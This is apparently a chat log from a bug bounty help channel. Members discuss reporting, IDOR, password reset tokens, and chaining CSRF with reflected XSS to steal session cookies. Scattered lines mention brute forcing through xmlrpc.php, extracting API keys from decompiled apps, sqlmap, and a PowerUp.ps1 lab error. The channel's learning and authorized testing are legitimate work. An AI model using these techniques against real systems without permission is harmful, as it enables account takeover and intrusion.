appreciate the feedback! This program's web app seems to have an issue with the auth flow so the password reset functionality isn't available to test 😦 I will however ask and give that a try, I had the thought initially so it's good to see I'm thinking along the right track

Trigger password change request from inside account,keep an eye on request in burp,maybe it send password reset request and email as parameter.(just a test case ,it totally depend on web app tho)

hello guys, so i'm new here

i want to ask about bug bounty

1. Do i need to use proxychains while attacking the target or it's okay with my adress IP?
2. when we finish the report how can I contact the target, the procedure, etc...

could anyone clarify those points

thanks in advance

1. No proxychains are needed in the slightest.. You may wanna use a VPN just so that if a site is using an aggressive WAF it could potentially block your IP access and hinder testing.
2. You'll be using Hackerone, Bugcrowd or another bounty platform I'd imagine so you'd submit to the program through the means they provide. The only time you would contact the client directly is if they have a program they manage on their own

okay thank you

Hey guys, one hypothetical question. If I were to do a bug bounty where I found a APi endpoint /users/"name of user".json that outputs information about the user(full account permissions, user-badges, groups, id's, account creation date, names,...) would that be a good Information Disclosure bug and how would I fuzz the "/users/" parameter with Intruder? Specifically I am looking for a wordlist that would allow me to fuzz it effectively.

That sounds like exactly intended functionality on many sites

Oh well, then I should go back and try some more. Thank you though for the response @vocal folio .

Gave +1 Rep to @vocal folio

Actuallyy if you get that its a broken access control/IDOR bug, depending on the application if its like facebook and you only see public data lets say then its not broken access control, But lets say its something like udemy or something idk and you see all the information about users without having access its an IDOR/Broken Access Control Bug .

Plus recently specially in Europe if this data is exposed just like that companies get fined 25k$ per user due to GDPR breach if such information is leaked

basically speaking you shouldnt have predictible route which leads you to get a lot of user information

Ex. /api/user/1 , /api/user/john

Ahh, thank you very much for the response.

I will let you know how the report goes.

Best of luck, Hope ypu get noiceee bounty on it amigo

Not sure if this is a valid bug or not but I found /xmlrpc.php on one of my target subdomains, following steps online, I'm able to use a method to perform a brute-force attack without any limiting.

Here's what my program says about brute forcing : Rate limiting or brute force issues on non-authentication endpoints

some people report and get $$ for it, I report and I get -5 rep

it's a coin flip 😂

cool, I just sent my first report, it's a VDP so no bounty, not looking forward to the -5 rep tho

happened to me.
pretty cringe and unmotivating when it does happen.

I mean it's not technically a bug

You want demotivating. Try submitting an SSRF or SQLi and getting a dupe 😂

Truthfully I'd probably be motivated because I found something valid lol

Primarily because it shows that I CAN find logic vulns

anybody get octohook to work? There is a problem with WordCompleter.

That's an old one I guess and it's more of a glitch

ohk

Hey guys what are some of the best programs out there with large scopes? -google and verizon

every bug bounty opportunity seems to be resolved

If I have file urls.txt and I want filter status 200 by curl, how do that and export to new file ? Please help me

Should instrumentationKey be public or private?

I just found one and i don't know if i should report it, that's why I asking you guys😕

Why can I not send pictures?

You have to verify

could try something like

for url in $(cat urls.txt); do
  echo -n "[*] ${url}" && curl -s -o /dev/null -w "%{http_code}" $url;
done```

that would print the response code for each url, and you could just grep for 200 codes and pipe that into a new file if necessary

Hell o I am new
How can I start bug bounty.. share some resources 🙌

How much hacking experience do u have?

Well 😂 30% idea

I have pdf of web hacking 101 but I need practical video lesson

Then I wouldnt jump into bug bounties until you have a strong knowledge in the field.

You can't really learn bug bounties on the job. I'd strongly advise you to learn the craft then come back to them.

you can learn by trying to do bug bounties, just don't expect much out of them yet if you're still new to the field 🙂

but it's probably more efficient to start with some web-related ctf's/wargames

and code your own webapps

@worthy folio hi

are CTF like bug bounties or where can one find THM bounties to practice on ?

CTF's are (usually) temporary competitions, sometimes with prizes, you can see which ones are going on at https://ctftime.org/

Following the web path is good on THM for bug bounties, there are also other great websites such as bugbountyhunter.com and another good one is ctfchallenge.com which is made by one of the THM staff adamtlangley

Hey guys, I am running PowerUp.ps1 on the "Steel Mountain" room and am getting errors. Anyone run into this issue?

#room-help This is the room for bug bounties...

oh ok. thanks

Do as frieddie mentioned or alternative(its fast than curl bz of thread) u may use ffuf ,try this ffuf -c -w url.txt -u FUZZ -t 100 -mc 200 | tee output.txt

Large scope,,Facebook twitter apple Microsoft tesla,,the big names 😂,,or you could also check public program on hackerone or bugcrowd with most wide asset

Thanx

Hackerone for example

Thanx

Good night guys see ya tomorrow.

Hi is someone using hakrawler ?

i've issues setting it up 😦

Can someone suggest me what foundation should I have for ctf challenges and where can I find the resources to gain that knowledge. Thank you so much for your support

TryHackMe (https://tryhackme.com/) is a great, free resource to learn, but you can also try HackTheBox, OverTheWire (correct me) and CTFTime.org.

We have plenty of resources in #resources but many resources you will probably find on the way. You may want to watch youtubers, such as John Hammond, ippsec etc. who create awesome videos and showcase different platforms.

Hi everyone,

What could be the impact of the vulnerability, if one is able to chain CSRF with reflected XSS, but the reflected XSS is on non authenticated page i.e sign in page?

Dm me,in case u r still stucked.

ig parameter u found xss on is something like redirect_url after signin and u gave value it javascript:alert(1)? (Those r some common cases)

No its in the POST body

Provide more context,,yes csrf can be chained with xss,cors can also be chained with xss.

Let me explain the scenario, its a link which is vulnerable to rXSS through POST parameter, its a valid CVE so I reported it and triager closed it saying that its self XSS. Now I used CSRF to send that payload so that presumably an attacker can use this CSRF POC to exploit rXSS and fetch the cookie
When we click the payload, it opens up the link the payload gets executed and then the page gets redirected to the login pga
*page
so I assumed that if the user is logged in already then before redirection, I can get his cookie through rXSS
but I cant verify it as the login page is of Cisco and I have no credentials off it

i know most of them ...Can you give me source to learn these Bugs/

read bug reports https://github.com/devanshbatham/Awesome-Bugbounty-Writeups ,https://hackerone.com/hacktivity

Few Hours ago I submitted ...passwordresetcode is leaking in password changing page request. But They marked it as NA. Any suggestions ?

if password reset code/token is leaked to third party services those reports are accepted as low severity ,check this report https://hackerone.com/reports/751581

@past hatch On Password Reset Page , after entering password when i hit submit and take the data on burp. I see the ressetcodetoken there. There is no Third party involvment there. Should i report same kind of bugs in future ?

if there is no impact,,not worth reporting either it will be marked as n/a or informative,,report like this https://hackerone.com/reports/751581 ,,https://hackerone.com/reports/342693 are accepted in some case

Thanks @past hatch

Gave +1 Rep to @past hatch

is it a bug if i create an account without the password criteria (8letters + numbers and uppercase) and the account creation doesnt actually work but keeps doing thr spining wheel

@limpid oak If you can create an account without following the password criteria and Length of your password is 1 then it would be consider as bug called "No password policy".

@hybrid orchid what's the stance on course self promotion?

Not if it's paid please

(Deleted for that reason)

bro how can i get started in bug bounty

There's a bunch of resources in pins

Thanks 🤝

Gave +1 Rep to @still jasper

Any courses to do for bug bounties?

Check pinned

Did anyone try this Grammarly CTF in HackerOne?
https://hackerone.com/grammarly?type=team

I would check for rate limit issue and if there is none then you can submit a report like no rate limit + weak password policy to increase the impact little bit but most of times its p4 with rate limit and p5 with only weak password policy

Obviously the reset token would be there else how could server verify who’s changing his password? Still if the reset token is leaking while changing password you shouldn’t submit that without confirmation, maybe the token is for one time use only? If you manage to leak tokens before changing password or if tokens still working after changing password then it would be p2. But make sure you know a way of attacking other for the purpose of poc

that's great explanation

Great Pins. Will have to have a look at this this weekend.

if a certain exploit leads to RCE then will I get the RCE severity reward or will it be the lower lvl exploit reward?

like some kinda misconfiguration that led to an RCE, will I get rewarded for RCE or misconfiguration cause sometimes there is a big difference

You'd be awarded for the RCE

Hey

I’m doing a web app testing on this website and I have found sql injection via cookie. Can anyone assist me in how I can manually test for it. Any useful information would be great

Does anyone know if would it be considered a bug if windows defender detects some malware and says that it has removed the threat, but it actually hasn't removed the threat? Just something I stumbled upon while coding a windows privilege escalation tool, but I don't know much about bug bounties.

Its all about the impact not how you find it so you will get the reward of a RCE

Use sqlmap?

This is what windows defender always do? :p i am not sure about that but in my opinion it should be an issue. Maybe you can do google about it

thanks, I will keep looking, Microsoft's site for bug bounties is a bit confusing lol

Gave +1 Rep to @dapper saffron

Microsofts bug bounty is shit but going off of what you've said it most likely wouldn't be deemed as a vulnerability

though technically it is seen as one

There is a bug bounty on an android app, how would you even start with that?

Like yeah I guess i can put it on an emulator but what then? Should I root the device and use it as a linux device?

Hackerone have tips on how to approach android bugs and what ines are common

I would suggest looking at that

Okay thanks @still jasper

Gave +1 Rep to @still jasper

It's actually 16 pounds right now

Yea it stopped now

He said he may do it again tomorrow

Sounds good

A good thing is decompiling the apk and yoinking all links/api keys and endpoints

You could alternatively run the app with burp proxy in the background to yoink api endpoints

Apps are beautiful for those sorta things

ah okay I see, thanks, I won't waste time on trying to report it then 👍

Gave +1 Rep to @native token

script for bug hunting,installs 21 tool for recon and hunt,Manas wrote it,i fixed it and added more tool 🙂 ,https://github.com/ManasHarsh/Cobra Happy hunting

so i found an exposed api key but i dunno what to do with it, looking through documentation I am pretty sure it was implemented incorrectly as it should have been something similar to a global variable, it's a key for a google geo api for android.

https://github.com/streaak/keyhacks

You may find this resource useful for a quick reference though proving impact with google api keys is difficult as google frequently refunds credits based on fraudulent activity on API keys

that is such a great github

2

@native token thanks

Gave +1 Rep to @native token

yeah everything isnt authorized, ill try all of them just to make sure

actually i just need to find the one that is authorized

if it exists

found it but the service is disabled, maybe it was already reported

nvm it worked there were 2 apis

so this bug can make anyone just spam the api and make them pay a lot of more money so i should get paid for it if its not reported

It’ll be an informational close

Google refund fraudulent activity on api keys

So has no impact on them

well that sucks so nothing out of this

Okay, I'm getting slightly frusrated with Steel Mountain. I'm trying to run the|| PowerUp.ps1 file in powershell once I've got it through Metasploit|| but I just get an error:

PS > . .\PowerUp.ps1
ERROR: I : The term 'I' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
ERROR: spelling of the name, or if a path was included, verify that the path is correct and try again.
ERROR: At C:\Users\bill\Desktop\PowerUp.ps1:4990 char:1
ERROR: + I
ERROR: + ~
ERROR:     + CategoryInfo          : ObjectNotFound: (I:String) [], CommandNotFoundException
ERROR:     + FullyQualifiedErrorId : CommandNotFoundException
ERROR: 

I can get PS access but I cannot get the file to run using . ||.\PowerUp.ps1.||

#room-help ill help u there

so anybody want to start a study group based on vulnerbilities

in depth

Hi, is there anyway to fetch all the subdomains ending with .mil? Is there any tool that enumerates subdomains based on wildcards? like *.mil?